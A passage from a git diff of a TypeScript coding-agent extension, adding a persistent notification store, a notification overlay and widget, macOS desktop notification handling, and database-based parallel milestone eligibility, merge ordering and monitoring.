+        this.tui.requestRender();
+      }
+    }, 3000);
+  }
+
+  private get filter(): FilterMode {
+    return FILTER_CYCLE[this.filterIndex]!;
+  }
+
+  private get filteredEntries(): NotificationEntry[] {
+    if (this.filter === "all") return this.entries;
+    return this.entries.filter((e) => e.severity === this.filter);
+  }
+
+  handleInput(data: string): void {
+    if (matchesKey(data, Key.escape) || matchesKey(data, Key.ctrl("c")) || matchesKey(data, Key.ctrlAlt("n"))) {
+      this.dispose();
+      this.onClose();
+      return;
+    }
+
+    // Scroll
+    if (matchesKey(data, Key.down) || matchesKey(data, "j")) {
+      this.scrollOffset++;
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+    if (matchesKey(data, Key.up) || matchesKey(data, "k")) {
+      this.scrollOffset = Math.max(0, this.scrollOffset - 1);
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+    if (data === "g") {
+      this.scrollOffset = 0;
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+    if (data === "G") {
+      this.scrollOffset = 999;
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+
+    // Filter cycle
+    if (data === "f") {
+      this.filterIndex = (this.filterIndex + 1) % FILTER_CYCLE.length;
+      this.scrollOffset = 0;
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+
+    // Clear all
+    if (data === "c") {
+      clearNotifications();
+      this.entries = [];
+      this.scrollOffset = 0;
+      this.invalidate();
+      this.tui.requestRender();
+      return;
+    }
+  }
+
+  render(width: number): string[] {
+    if (this.cachedLines && this.cachedWidth === width) {
+      return this.cachedLines;
+    }
+
+    const content = this.buildContentLines(width);
+    const maxVisibleRows = Math.max(5, process.stdout.rows ? process.stdout.rows - 8 : 24) - 2;
+    const visibleContentRows = Math.min(content.length, maxVisibleRows);
+    const maxScroll = Math.max(0, content.length - visibleContentRows);
+    this.scrollOffset = Math.min(this.scrollOffset, maxScroll);
+    const visibleContent = content.slice(this.scrollOffset, this.scrollOffset + visibleContentRows);
+
+    const lines = this.wrapInBox(visibleContent, width);
+
+    this.cachedWidth = width;
+    this.cachedLines = lines;
+    return lines;
+  }
+
+  invalidate(): void {
+    this.cachedLines = undefined;
+    this.cachedWidth = undefined;
+  }
+
+  dispose(): void {
+    this.disposed = true;
+    clearInterval(this.refreshTimer);
+    if (this.resizeHandler) {
+      process.stdout.removeListener("resize", this.resizeHandler);
+      this.resizeHandler = null;
+    }
+  }
+
+  private wrapInBox(inner: string[], width: number): string[] {
+    const th = this.theme;
+    const border = (s: string) => th.fg("borderAccent", s);
+    const innerWidth = width - 4;
+    const lines: string[] = [];
+
+    lines.push(border("╭" + "─".repeat(width - 2) + "╮"));
+    for (const line of inner) {
+      const truncated = truncateToWidth(line, innerWidth);
+      const padWidth = Math.max(0, innerWidth - visibleWidth(truncated));
+      lines.push(border("│") + " " + truncated + " ".repeat(padWidth) + " " + border("│"));
+    }
+    lines.push(border("╰" + "─".repeat(width - 2) + "╯"));
+    return lines;
+  }
+
+  private buildContentLines(width: number): string[] {
+    const th = this.theme;
+    const shellWidth = width - 4;
+    const contentWidth = Math.min(shellWidth, 128);
+    const sidePad = Math.max(0, Math.floor((shellWidth - contentWidth) / 2));
+    const leftMargin = " ".repeat(sidePad);
+    const lines: string[] = [];
+
+    const row = (content = ""): string => {
+      const truncated = truncateToWidth(content, contentWidth);
+      return leftMargin + padRight(truncated, contentWidth);
+    };
+    const blank = () => row("");
+    const hr = () => row(th.fg("dim", "─".repeat(contentWidth)));
+
+    // Header
+    const title = th.fg("accent", th.bold("Notifications"));
+    const filterLabel = this.filter === "all"
+      ? th.fg("dim", "all")
+      : th.fg(this.filter === "error" ? "error" : this.filter === "warning" ? "warning" : "dim", this.filter);
+    const count = `${this.filteredEntries.length} entries`;
+    lines.push(row(joinColumns(
+      `${title}  ${th.fg("dim", "filter:")} ${filterLabel}`,
+      th.fg("dim", count),
+      contentWidth,
+    )));
+    lines.push(hr());
+
+    // Controls
+    lines.push(row(th.fg("dim", "↑/↓ scroll  f filter  c clear  Esc close")));
+    lines.push(blank());
+
+    // Entries
+    const filtered = this.filteredEntries;
+    if (filtered.length === 0) {
+      lines.push(blank());
+      lines.push(row(th.fg("dim", this.entries.length === 0
+        ? "No notifications yet."
+        : `No ${this.filter} notifications.`)));
+      lines.push(blank());
+      return lines;
+    }
+
+    for (const entry of filtered) {
+      const icon = severityIcon(entry.severity);
+      const coloredIcon = entry.severity === "error" ? th.fg("error", icon)
+        : entry.severity === "warning" ? th.fg("warning", icon)
+          : entry.severity === "success" ? th.fg("success", icon)
+            : th.fg("dim", icon);
+      const time = th.fg("dim", formatTimestamp(entry.ts));
+      const source = entry.source === "workflow-logger" ? th.fg("dim", " [engine]") : "";
+
+      // Measure actual prefix width for wrapping
+      const prefix = `${coloredIcon} ${time}${source}  `;
+      const prefixWidth = visibleWidth(prefix);
+      const msgMaxWidth = Math.max(10, contentWidth - prefixWidth);
+
+      // Wrap long messages onto continuation lines indented to align with message start
+      const msgLines = wrapText(entry.message, msgMaxWidth);
+      const indent = " ".repeat(prefixWidth);
+      for (let i = 0; i < msgLines.length; i++) {
+        if (i === 0) {
+          lines.push(row(`${prefix}${msgLines[i]}`));
+        } else {
+          lines.push(row(`${indent}${msgLines[i]}`));
+        }
+      }
+    }
+
+    return lines;
+  }
+}
diff --git a/src/resources/extensions/gsd/notification-store.ts b/src/resources/extensions/gsd/notification-store.ts
new file mode 100644
index 000000000..d79d4a33c
--- /dev/null
+++ b/src/resources/extensions/gsd/notification-store.ts
@@ -0,0 +1,293 @@
+// GSD Extension — Persistent Notification Store
+// Captures all ctx.ui.notify() calls and workflow-logger warnings to
+// .gsd/notifications.jsonl so they survive context resets and session restarts.
+// Rotates at MAX_ENTRIES to prevent unbounded growth.
+
+import { appendFileSync, existsSync, mkdirSync, openSync, closeSync, readFileSync, renameSync, unlinkSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { randomUUID } from "node:crypto";
+
+// ─── Types ──────────────────────────────────────────────────────────────
+
+export type NotifySeverity = "info" | "success" | "warning" | "error";
+export type NotificationSource = "notify" | "workflow-logger";
+
+export interface NotificationEntry {
+  id: string;
+  ts: string;
+  severity: NotifySeverity;
+  message: string;
+  source: NotificationSource;
+  read: boolean;
+}
+
+// ─── Constants ──────────────────────────────────────────────────────────
+
+const MAX_ENTRIES = 500;
+const FILENAME = "notifications.jsonl";
+const LOCKFILE = "notifications.lock";
+
+// ─── Module State ───────────────────────────────────────────────────────
+
+let _basePath: string | null = null;
+let _lineCount = 0;  // Hint for rotation — not authoritative for public API
+let _suppressCount = 0;
+
+// ─── Public API ─────────────────────────────────────────────────────────
+
+/**
+ * Initialize the notification store. Call once at session start with the
+ * project root. Seeds in-memory counters from the existing file on disk.
+ */
+export function initNotificationStore(basePath: string): void {
+  _basePath = basePath;
+  // Seed line count hint for rotation — public counters read from disk
+  _lineCount = _readEntriesFromDisk(basePath).length;
+}
+
+/**
+ * Append a notification entry to the store. Synchronous — safe to call
+ * from the notify() shim which is declared void (not async).
+ */
+export function appendNotification(
+  message: string,
+  severity: NotifySeverity,
+  source: NotificationSource = "notify",
+): void {
+  if (!_basePath) return;
+  if (_suppressCount > 0) return;
+
+  const entry: NotificationEntry = {
+    id: randomUUID(),
+    ts: new Date().toISOString(),
+    severity,
+    message: message.length > 500 ? message.slice(0, 500) + "…" : message,
+    source,
+    read: false,
+  };
+
+  try {
+    const dir = join(_basePath, ".gsd");
+    mkdirSync(dir, { recursive: true });
+    appendFileSync(join(dir, FILENAME), JSON.stringify(entry) + "\n", "utf-8");
+    _lineCount++;
+
+    // Rotate if hint suggests we're over limit
+    if (_lineCount > MAX_ENTRIES) {
+      _rotate();
+    }
+  } catch {
+    // Non-fatal — never let persistence break the caller
+  }
+}
+
+/**
+ * Read all notification entries from disk. Returns newest-first.
+ */
+export function readNotifications(basePath?: string): NotificationEntry[] {
+  const bp = basePath ?? _basePath;
+  if (!bp) return [];
+  return _readEntriesFromDisk(bp).reverse();
+}
+
+/**
+ * Mark all notifications as read. Atomic rewrite via temp-file + rename.
+ * Resyncs in-memory counters from disk after mutation.
+ */
+export function markAllRead(basePath?: string): void {
+  const bp = basePath ?? _basePath;
+  if (!bp) return;
+
+  const entries = _readEntriesFromDisk(bp);
+  if (entries.length === 0) return;
+
+  const hasUnread = entries.some((e) => !e.read);
+  if (!hasUnread) return;
+
+  try {
+    _withLock(bp, () => {
+      // Re-read inside lock to get freshest state
+      const fresh = _readEntriesFromDisk(bp);
+      if (fresh.length === 0 || !fresh.some((e) => !e.read)) return;
+      const lines = fresh.map((e) => JSON.stringify({ ...e, read: true }));
+      _atomicWrite(bp, lines.join("\n") + "\n");
+    });
+  } catch {
+    // Non-fatal
+  }
+}
+
+/**
+ * Clear all notifications. Atomic write of empty content under lock.
+ */
+export function clearNotifications(basePath?: string): void {
+  const bp = basePath ?? _basePath;
+  if (!bp) return;
+
+  try {
+    _withLock(bp, () => {
+      _atomicWrite(bp, "");
+    });
+  } catch {
+    // Non-fatal
+  }
+}
+
+/**
+ * Get the current unread count. Reads from disk to stay accurate across
+ * processes (web subprocess can clear/modify the file independently).
+ */
+export function getUnreadCount(): number {
+  if (!_basePath) return 0;
+  try {
+    const entries = _readEntriesFromDisk(_basePath);
+    return entries.filter((e) => !e.read).length;
+  } catch {
+    return 0;
+  }
+}
+
+/**
+ * Get the total notification count. Reads from disk for cross-process accuracy.
+ */
+export function getLineCount(): number {
+  if (!_basePath) return 0;
+  try {
+    return _readEntriesFromDisk(_basePath).length;
+  } catch {
+    return 0;
+  }
+}
+
+/**
+ * Temporarily suppress persistence. Use around ctx.ui.notify calls that
+ * should NOT be persisted (e.g., confirmation toasts after clear).
+ * Calls are ref-counted — nest safely.
+ */
+export function suppressPersistence(): void {
+  _suppressCount++;
+}
+
+export function unsuppressPersistence(): void {
+  _suppressCount = Math.max(0, _suppressCount - 1);
+}
+
+// ─── Test Helpers ───────────────────────────────────────────────────────
+
+/**
+ * Reset module state. Only for use in tests.
+ */
+export function _resetNotificationStore(): void {
+  _basePath = null;
+  _lineCount = 0;
+  _suppressCount = 0;
+}
+
+// ─── Internal ───────────────────────────────────────────────────────────
+
+function _readEntriesFromDisk(basePath: string): NotificationEntry[] {
+  const filePath = join(basePath, ".gsd", FILENAME);
+  if (!existsSync(filePath)) return [];
+  try {
+    const content = readFileSync(filePath, "utf-8");
+    return content
+      .split("\n")
+      .filter((l) => l.length > 0)
+      .map((l) => {
+        try {
+          return JSON.parse(l) as NotificationEntry;
+        } catch {
+          return null;
+        }
+      })
+      .filter((e): e is NotificationEntry => e !== null);
+  } catch {
+    return [];
+  }
+}
+
+function _rotate(): void {
+  if (!_basePath) return;
+  try {
+    _withLock(_basePath, () => {
+      // Re-read inside lock to get freshest state
+      const entries = _readEntriesFromDisk(_basePath!);
+      if (entries.length <= MAX_ENTRIES) return;
+      const trimmed = entries.slice(entries.length - MAX_ENTRIES);
+      const lines = trimmed.map((e) => JSON.stringify(e));
+      _atomicWrite(_basePath!, lines.join("\n") + "\n");
+    });
+  } catch {
+    // Non-fatal
+  }
+}
+
+/**
+ * Atomic file rewrite via temp-file + rename. Prevents partial reads
+ * by other processes (web API subprocess, parallel workers).
+ * Must be called inside _withLock for cross-process safety.
+ */
+function _atomicWrite(basePath: string, content: string): void {
+  const dir = join(basePath, ".gsd");
+  mkdirSync(dir, { recursive: true });
+  const target = join(dir, FILENAME);
+  const tmp = target + ".tmp." + process.pid;
+  writeFileSync(tmp, content, "utf-8");
+  renameSync(tmp, target);
+}
+
+/**
+ * Acquire an exclusive lockfile for rewrite operations.
+ * Uses O_CREAT|O_EXCL for atomic creation — if the file exists, another
+ * process holds the lock. Retries briefly, then proceeds anyway (best-effort)
+ * to avoid deadlocking the UI on a stale lock.
+ */
+function _withLock<T>(basePath: string, fn: () => T): T {
+  const lockPath = join(basePath, ".gsd", LOCKFILE);
+  let fd: number | null = null;
+  const maxAttempts = 5;
+  const retryMs = 20;
+
+  for (let i = 0; i < maxAttempts; i++) {
+    try {
+      mkdirSync(join(basePath, ".gsd"), { recursive: true });
+      fd = openSync(lockPath, "wx");
+      break;
+    } catch (err: any) {
+      if (err?.code === "EEXIST") {
+        // Check if lock is stale (older than 5s)
+        try {
+          const stat = readFileSync(lockPath, "utf-8");
+          const lockTime = parseInt(stat, 10);
+          if (Date.now() - lockTime > 5000) {
+            try { unlinkSync(lockPath); } catch { /* race ok */ }
+            continue;
+          }
+        } catch { /* can't read lock, retry */ }
+
+        // Wait and retry
+        const start = Date.now();
+        while (Date.now() - start < retryMs) { /* spin */ }
+        continue;
+      }
+      // Other error — proceed without lock
+      break;
+    }
+  }
+
+  // Only run the mutation if we actually own the lock
+  const ownsLock = fd !== null;
+  try {
+    if (ownsLock && fd !== null) {
+      // Write our PID timestamp into the lock for stale detection
+      writeFileSync(lockPath, String(Date.now()), "utf-8");
+      closeSync(fd);
+    }
+    return fn();
+  } finally {
+    // Only delete the lock if we created it — never remove another process's lock
+    if (ownsLock) {
+      try { unlinkSync(lockPath); } catch { /* best-effort cleanup */ }
+    }
+  }
+}
diff --git a/src/resources/extensions/gsd/notification-widget.ts b/src/resources/extensions/gsd/notification-widget.ts
new file mode 100644
index 000000000..8a963be5e
--- /dev/null
+++ b/src/resources/extensions/gsd/notification-widget.ts
@@ -0,0 +1,69 @@
+// GSD Extension — Notification Widget
+// Always-on ambient widget rendered belowEditor showing unread count and
+// the most recent notification message. Refreshes every 5 seconds.
+// Widget key: "gsd-notifications", placement: "belowEditor"
+
+import type { ExtensionContext } from "@gsd/pi-coding-agent";
+
+import { getUnreadCount, readNotifications } from "./notification-store.js";
+import { formatShortcut } from "./files.js";
+
+// ─── Pure rendering ──���────────────────────────���─────────────────────────
+
+export function buildNotificationWidgetLines(): string[] {
+  const unread = getUnreadCount();
+  if (unread === 0) return [];
+
+  const entries = readNotifications();
+  const latest = entries[0]; // newest-first
+  if (!latest) return [];
+
+  const icon = latest.severity === "error" ? "✗" : latest.severity === "warning" ? "⚠" : "●";
+  const badge = `${unread} unread`;
+  const msgMax = 80;
+  const truncated = latest.message.length > msgMax
+    ? latest.message.slice(0, msgMax - 1) + "…"
+    : latest.message;
+
+  return [`  ${icon} [${badge}]  ${truncated}  (${formatShortcut("Ctrl+Alt+N")} to view)`];
+}
+
+// ─── Widget init ────────────────────────────────────────────────────────
+
+const REFRESH_INTERVAL_MS = 5_000;
+
+/**
+ * Initialize the always-on notification widget (belowEditor).
+ * Call once from session_start after the notification store is initialized.
+ */
+export function initNotificationWidget(ctx: ExtensionContext): void {
+  if (!ctx.hasUI) return;
+
+  // String-array fallback for RPC mode
+  ctx.ui.setWidget("gsd-notifications", buildNotificationWidgetLines(), { placement: "belowEditor" });
+
+  // Factory-based widget for TUI mode
+  ctx.ui.setWidget("gsd-notifications", (_tui, _theme) => {
+    let cachedLines: string[] | undefined;
+
+    const refresh = () => {
+      cachedLines = undefined;
+      _tui.requestRender();
+    };
+
+    const refreshTimer = setInterval(refresh, REFRESH_INTERVAL_MS);
+
+    return {
+      render(_width: number): string[] {
+        if (!cachedLines) cachedLines = buildNotificationWidgetLines();
+        return cachedLines;
+      },
+      invalidate(): void {
+        cachedLines = undefined;
+      },
+      dispose(): void {
+        clearInterval(refreshTimer);
+      },
+    };
+  }, { placement: "belowEditor" });
+}
diff --git a/src/resources/extensions/gsd/notifications.ts b/src/resources/extensions/gsd/notifications.ts
index 901d48819..0efd0d4c3 100644
--- a/src/resources/extensions/gsd/notifications.ts
+++ b/src/resources/extensions/gsd/notifications.ts
@@ -23,7 +23,13 @@ export function sendDesktopNotification(
   message: string,
   level: NotifyLevel = "info",
   kind: NotificationKind = "complete",
+  projectName?: string,
 ): void {
+  // When a projectName is provided and the title is the default "GSD",
+  // replace it with a project-qualified title for multi-project clarity.
+  if (projectName && title === "GSD") {
+    title = formatNotificationTitle(projectName);
+  }
   const loaded = loadEffectiveGSDPreferences()?.preferences;
   if (!shouldSendDesktopNotification(kind, loaded?.notifications)) return;
 
@@ -64,6 +70,16 @@ export function shouldSendDesktopNotification(
   }
 }
 
+/**
+ * Format a notification title that includes the project name for context.
+ * Returns "GSD — projectName" when a project name is available, otherwise "GSD".
+ */
+export function formatNotificationTitle(projectName?: string): string {
+  const trimmed = projectName?.trim();
+  if (trimmed) return `GSD — ${trimmed}`;
+  return "GSD";
+}
+
 export function buildDesktopNotificationCommand(
   platform: NodeJS.Platform,
   title: string,
@@ -74,6 +90,17 @@ export function buildDesktopNotificationCommand(
   const normalizedMessage = normalizeNotificationText(message);
 
   if (platform === "darwin") {
+    // Prefer terminal-notifier: registers as its own Notification Center app,
+    // so it gets a proper permission entry in System Settings → Notifications.
+    // osascript notifications are silently swallowed when the calling terminal
+    // (Ghostty, iTerm2, etc.) lacks notification permissions — exits 0, no error.
+    // See: https://github.com/gsd-build/gsd-2/issues/2632
+    const tnPath = findExecutable("terminal-notifier");
+    if (tnPath) {
+      const sound = level === "error" ? "Basso" : "Glass";
+      return { file: tnPath, args: ["-title", normalizedTitle, "-message", normalizedMessage, "-sound", sound] };
+    }
+    // Fallback: osascript (works if terminal app has notification permissions)
     const sound = level === "error" ? 'sound name "Basso"' : 'sound name "Glass"';
     const script = `display notification "${escapeAppleScript(normalizedMessage)}" with title "${escapeAppleScript(normalizedTitle)}" ${sound}`;
     return { file: "osascript", args: ["-e", script] };
@@ -94,3 +121,15 @@ function normalizeNotificationText(s: string): string {
 function escapeAppleScript(s: string): string {
   return s.replace(/\\/g, "\\\\").replace(/"/g, '\\"');
 }
+
+/**
+ * Locate an executable on PATH. Returns absolute path or null.
+ * Non-fatal — returns null on any error.
+ */
+function findExecutable(name: string): string | null {
+  try {
+    return execFileSync("which", [name], { timeout: 2000, stdio: ["ignore", "pipe", "ignore"] }).toString().trim() || null;
+  } catch {
+    return null;
+  }
+}
diff --git a/src/resources/extensions/gsd/parallel-eligibility.ts b/src/resources/extensions/gsd/parallel-eligibility.ts
index b02a8f0db..ea30521b9 100644
--- a/src/resources/extensions/gsd/parallel-eligibility.ts
+++ b/src/resources/extensions/gsd/parallel-eligibility.ts
@@ -6,9 +6,9 @@
  */
 
 import { deriveState } from "./state.js";
-import { parseRoadmap, parsePlan, loadFile } from "./files.js";
 import { resolveMilestoneFile, resolveSliceFile } from "./paths.js";
 import { findMilestoneIds } from "./guided-flow.js";
+import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js";
 import type { MilestoneRegistryEntry } from "./types.js";
 
 // ─── Types ───────────────────────────────────────────────────────────────────
@@ -36,27 +36,23 @@ async function collectTouchedFiles(
   basePath: string,
   milestoneId: string,
 ): Promise<string[]> {
-  const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
-  if (!roadmapPath) return [];
-
-  const roadmapContent = await loadFile(roadmapPath);
-  if (!roadmapContent) return [];
-
-  const roadmap = parseRoadmap(roadmapContent);
   const files = new Set<string>();
 
-  for (const slice of roadmap.slices) {
-    const planPath = resolveSliceFile(basePath, milestoneId, slice.id, "PLAN");
-    if (!planPath) continue;
-
-    const planContent = await loadFile(planPath);
-    if (!planContent) continue;
-
-    const plan = parsePlan(planContent);
-    for (const f of plan.filesLikelyTouched) {
-      files.add(f);
+  if (isDbAvailable()) {
+    // DB path: query slices and their tasks for file lists
+    const slices = getMilestoneSlices(milestoneId);
+    for (const slice of slices) {
+      const tasks = getSliceTasks(milestoneId, slice.id);
+      for (const task of tasks) {
+        if (Array.isArray(task.files)) {
+          for (const f of task.files) {
+            files.add(f);
+          }
+        }
+      }
     }
   }
+  // When DB unavailable, return empty file set — parallel eligibility cannot be determined
 
   return [...files];
 }
@@ -116,7 +112,20 @@ export async function analyzeParallelEligibility(
   for (const mid of milestoneIds) {
     const entry = registryMap.get(mid);
     const title = entry?.title ?? mid;
-    const status = entry?.status ?? "pending";
+
+    // Rule 0: milestones with no registry entry (ghost directories, unknown
+    // state) are ineligible — we cannot determine their status or deps (#2501)
+    if (!entry) {
+      ineligible.push({
+        milestoneId: mid,
+        title,
+        eligible: false,
+        reason: "Milestone has no planning data — cannot determine eligibility.",
+      });
+      continue;
+    }
+
+    const status = entry.status;
 
     // Rule 1: skip complete and parked milestones
     if (status === "complete" || status === "parked") {
@@ -130,7 +139,7 @@ export async function analyzeParallelEligibility(
     }
 
     // Rule 2: check dependency satisfaction
-    const deps = entry?.dependsOn ?? [];
+    const deps = entry.dependsOn ?? [];
     const unsatisfied = deps.filter(dep => {
       const depEntry = registryMap.get(dep);
       return !depEntry || depEntry.status !== "complete";
diff --git a/src/resources/extensions/gsd/parallel-merge.ts b/src/resources/extensions/gsd/parallel-merge.ts
index 835920a1f..09a179869 100644
--- a/src/resources/extensions/gsd/parallel-merge.ts
+++ b/src/resources/extensions/gsd/parallel-merge.ts
@@ -5,6 +5,9 @@
  * with safety checks for parallel execution context.
  */
 
+import { existsSync, readdirSync } from "node:fs";
+import { join } from "node:path";
+import { spawnSync } from "node:child_process";
 import { loadFile } from "./files.js";
 import { resolveMilestoneFile } from "./paths.js";
 import { mergeMilestoneToMain } from "./auto-worktree.js";
@@ -12,6 +15,7 @@ import { MergeConflictError } from "./git-service.js";
 import { removeSessionStatus } from "./session-status-io.js";
 import type { WorkerInfo } from "./parallel-orchestrator.js";
 import { getErrorMessage } from "./error-utils.js";
+import { logWarning } from "./workflow-logger.js";
 
 // ─── Types ─────────────────────────────────────────────────────────────────
 
@@ -28,22 +32,103 @@ export type MergeOrder = "sequential" | "by-completion";
 
 // ─── Merge Queue ───────────────────────────────────────────────────────────
 
+/**
+ * Check whether a milestone is complete by querying its worktree SQLite DB.
+ * Uses a subprocess to avoid disrupting the global DB singleton.
+ * Returns true when milestones.status = 'complete' in the worktree's gsd.db.
+ */
+export function isMilestoneCompleteInWorktreeDb(basePath: string, mid: string): boolean {
+  const dbPath = join(basePath, ".gsd", "worktrees", mid, ".gsd", "gsd.db");
+  if (!existsSync(dbPath)) return false;
+
+  try {
+    const result = spawnSync(
+      "sqlite3",
+      [dbPath, `SELECT status FROM milestones WHERE id='${mid}' LIMIT 1`],
+      { timeout: 3000, encoding: "utf-8" },
+    );
+    return (result.stdout || "").trim() === "complete";
+  } catch (e) {
+    logWarning("parallel", `spawnSync milestone completion check failed for ${mid}: ${(e as Error).message}`);
+    return false;
+  }
+}
+
+/**
+ * Discover milestone IDs with status='complete' in their worktree DB,
+ * scanning .gsd/worktrees/<MID>/.gsd/gsd.db for each worktree directory.
+ */
+function discoverDbCompletedMilestones(basePath: string): Set<string> {
+  const completed = new Set<string>();
+  const worktreeDir = join(basePath, ".gsd", "worktrees");
+  try {
+    for (const entry of readdirSync(worktreeDir)) {
+      if (entry.startsWith("M") && isMilestoneCompleteInWorktreeDb(basePath, entry)) {
+        completed.add(entry);
+      }
+    }
+  } catch (e) {
+    logWarning("parallel", `readdirSync for completed set failed: ${(e as Error).message}`);
+  }
+  return completed;
+}
+
 /**
  * Determine safe merge order for completed milestones.
  * Sequential: merge in milestone ID order (M001 before M002).
  * By-completion: merge in the order milestones finished.
+ *
+ * When basePath is provided, also checks worktree SQLite DBs as the
+ * source of truth — workers with stale orchestrator state (e.g. "error")
+ * are included if their worktree DB shows status='complete'.
+ * See: https://github.com/gsd-build/gsd-2/issues/2812
  */
 export function determineMergeOrder(
   workers: WorkerInfo[],
   order: MergeOrder = "sequential",
+  basePath?: string,
 ): string[] {
-  const completed = workers.filter(w => w.state === "stopped" && w.completedUnits > 0);
+  // Start with workers the orchestrator already knows are stopped
+  const stoppedIds = new Set(
+    workers.filter(w => w.state === "stopped").map(w => w.milestoneId),
+  );
+
+  // When basePath is available, also check worktree DBs for milestones
+  // whose orchestrator state is stale but are actually complete (#2812)
+  const dbCompleted = basePath ? discoverDbCompletedMilestones(basePath) : new Set<string>();
+
+  // Union: milestone is mergeable if stopped OR DB-complete
+  const mergeableIds = new Set([...stoppedIds, ...dbCompleted]);
+
+  // Build the list from tracked workers + any DB-discovered milestones
+  // not tracked by the orchestrator at all
+  const workerMap = new Map(workers.map(w => [w.milestoneId, w]));
+  const allMergeable: WorkerInfo[] = [];
+  for (const mid of mergeableIds) {
+    const w = workerMap.get(mid);
+    if (w) {
+      allMergeable.push(w);
+    } else {
+      // Milestone discovered from worktree DB but not in workers list
+      allMergeable.push({
+        milestoneId: mid,
+        title: mid,
+        pid: 0,
+        process: null,
+        worktreePath: basePath ? join(basePath, ".gsd", "worktrees", mid) : "",
+        startedAt: 0,
+        state: "stopped",
+        cost: 0,
+      });
+    }
+  }
+
   if (order === "by-completion") {
-    return completed
+    return allMergeable
       .sort((a, b) => a.startedAt - b.startedAt) // earliest first
       .map(w => w.milestoneId);
   }
-  return completed
+  return allMergeable
     .sort((a, b) => a.milestoneId.localeCompare(b.milestoneId))
     .map(w => w.milestoneId);
 }
@@ -114,7 +199,7 @@ export async function mergeAllCompleted(
   workers: WorkerInfo[],
   order: MergeOrder = "sequential",
 ): Promise<MergeResult[]> {
-  const mergeOrder = determineMergeOrder(workers, order);
+  const mergeOrder = determineMergeOrder(workers, order, basePath);
   const results: MergeResult[] = [];
 
   for (const mid of mergeOrder) {
diff --git a/src/resources/extensions/gsd/parallel-monitor-overlay.ts b/src/resources/extensions/gsd/parallel-monitor-overlay.ts
new file mode 100644
index 000000000..d56623621
--- /dev/null
+++ b/src/resources/extensions/gsd/parallel-monitor-overlay.ts
@@ -0,0 +1,499 @@
+/**
+ * GSD Parallel Monitor Overlay
+ *
+ * Full-screen TUI overlay showing real-time parallel worker progress.
+ * Opened via `/gsd parallel watch` or Ctrl+Alt+P (⌃⌥P on macOS).
+ * Reads the same data sources as `scripts/parallel-monitor.mjs` but
+ * renders as a native pi-tui overlay with theme integration.
+ */
+
+import { existsSync, statSync, readFileSync, openSync, readSync, closeSync, readdirSync } from "node:fs";
+import { join } from "node:path";
+import { spawnSync } from "node:child_process";
+
+import type { Theme } from "@gsd/pi-coding-agent";
+import { truncateToWidth, visibleWidth, matchesKey, Key } from "@gsd/pi-tui";
+
+import { formatDuration, STATUS_GLYPH, STATUS_COLOR } from "../shared/mod.js";
+
+// ─── Types ────────────────────────────────────────────────────────────────
+
+interface StatusJson {
+  milestoneId: string;
+  pid: number;
+  state: string;
+  cost: number;
+  lastHeartbeat: number;
+  startedAt: number;
+  worktreePath: string;
+}
+
+interface AutoLock {
+  pid: number;
+  startedAt: string;
+  unitType: string;
+  unitId: string;
+  unitStartedAt: string;
+}
+
+interface SliceProgress {
+  id: string;
+  status: string;
+  total: number;
+  done: number;
+}
+
+interface WorkerView {
+  mid: string;
+  pid: number;
+  alive: boolean;
+  state: string;
+  cost: number;
+  heartbeatAge: number;
+  currentUnit: string | null;
+  unitType: string | null;
+  unitElapsed: number;
+  elapsed: number;
+  totalTasks: number;
+  doneTasks: number;
+  totalSlices: number;
+  doneSlices: number;
+  slices: SliceProgress[];
+  errors: string[];
+}
+
+// ─── Data Helpers ─────────────────────────────────────────────────────────
+
+function readJsonSafe<T>(filePath: string): T | null {
+  try {
+    return JSON.parse(readFileSync(filePath, "utf-8")) as T;
+  } catch {
+    return null;
+  }
+}
+
+function isPidAlive(pid: number): boolean {
+  try {
+    process.kill(pid, 0);
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+function tailRead(filePath: string, maxBytes: number): string {
+  try {
+    const stat = statSync(filePath);
+    const readSize = Math.min(stat.size, maxBytes);
+    const fd = openSync(filePath, "r");
+    const buf = Buffer.alloc(readSize);
+    readSync(fd, buf, 0, readSize, Math.max(0, stat.size - readSize));
+    closeSync(fd);
+    return buf.toString("utf-8");
+  } catch {
+    return "";
+  }
+}
+
+function discoverWorkers(basePath: string): string[] {
+  const parallelDir = join(basePath, ".gsd", "parallel");
+  const worktreeDir = join(basePath, ".gsd", "worktrees");
+  const mids = new Set<string>();
+
+  if (existsSync(parallelDir)) {
+    try {
+      for (const f of readdirSync(parallelDir)) {
+        if (f.endsWith(".status.json")) mids.add(f.replace(".status.json", ""));
+        const m = f.match(/^(M\d+)\.(stderr|stdout)\.log$/);
+        if (m) mids.add(m[1]);
+      }
+    } catch { /* skip */ }
+  }
+
+  if (existsSync(worktreeDir)) {
+    try {
+      for (const d of readdirSync(worktreeDir)) {
+        if (d.startsWith("M") && existsSync(join(worktreeDir, d, ".gsd", "auto.lock"))) {
+          mids.add(d);
+        }
+      }
+    } catch { /* skip */ }
+  }
+
+  return [...mids].sort();
+}
+
+function querySliceProgress(basePath: string, mid: string): SliceProgress[] {
+  const dbPath = join(basePath, ".gsd", "worktrees", mid, ".gsd", "gsd.db");
+  if (!existsSync(dbPath)) return [];
+
+  try {
+    const sql = `SELECT s.id, s.status, COUNT(t.id), SUM(CASE WHEN t.status='complete' THEN 1 ELSE 0 END) FROM slices s LEFT JOIN tasks t ON s.milestone_id=t.milestone_id AND s.id=t.slice_id WHERE s.milestone_id='${mid}' GROUP BY s.id ORDER BY s.id`;
+    const result = spawnSync("sqlite3", [dbPath, sql], { timeout: 3000, encoding: "utf-8" });
+    const out = (result.stdout || "").trim();
+    if (!out || result.status !== 0) return [];
+    return out.split("\n").map((line) => {
+      const [id, status, total, done] = line.split("|");
+      return { id, status, total: parseInt(total, 10), done: parseInt(done || "0", 10) };
+    });
+  } catch {
+    return [];
+  }
+}
+
+function extractCostFromNdjson(basePath: string, mid: string): number {
+  const stdoutPath = join(basePath, ".gsd", "parallel", `${mid}.stdout.log`);
+  if (!existsSync(stdoutPath)) return 0;
+  try {
+    const content = readFileSync(stdoutPath, "utf-8");
+    let total = 0;
+    for (const line of content.split("\n")) {
+      if (!line.includes("message_end")) continue;
+      try {
+        const obj = JSON.parse(line);
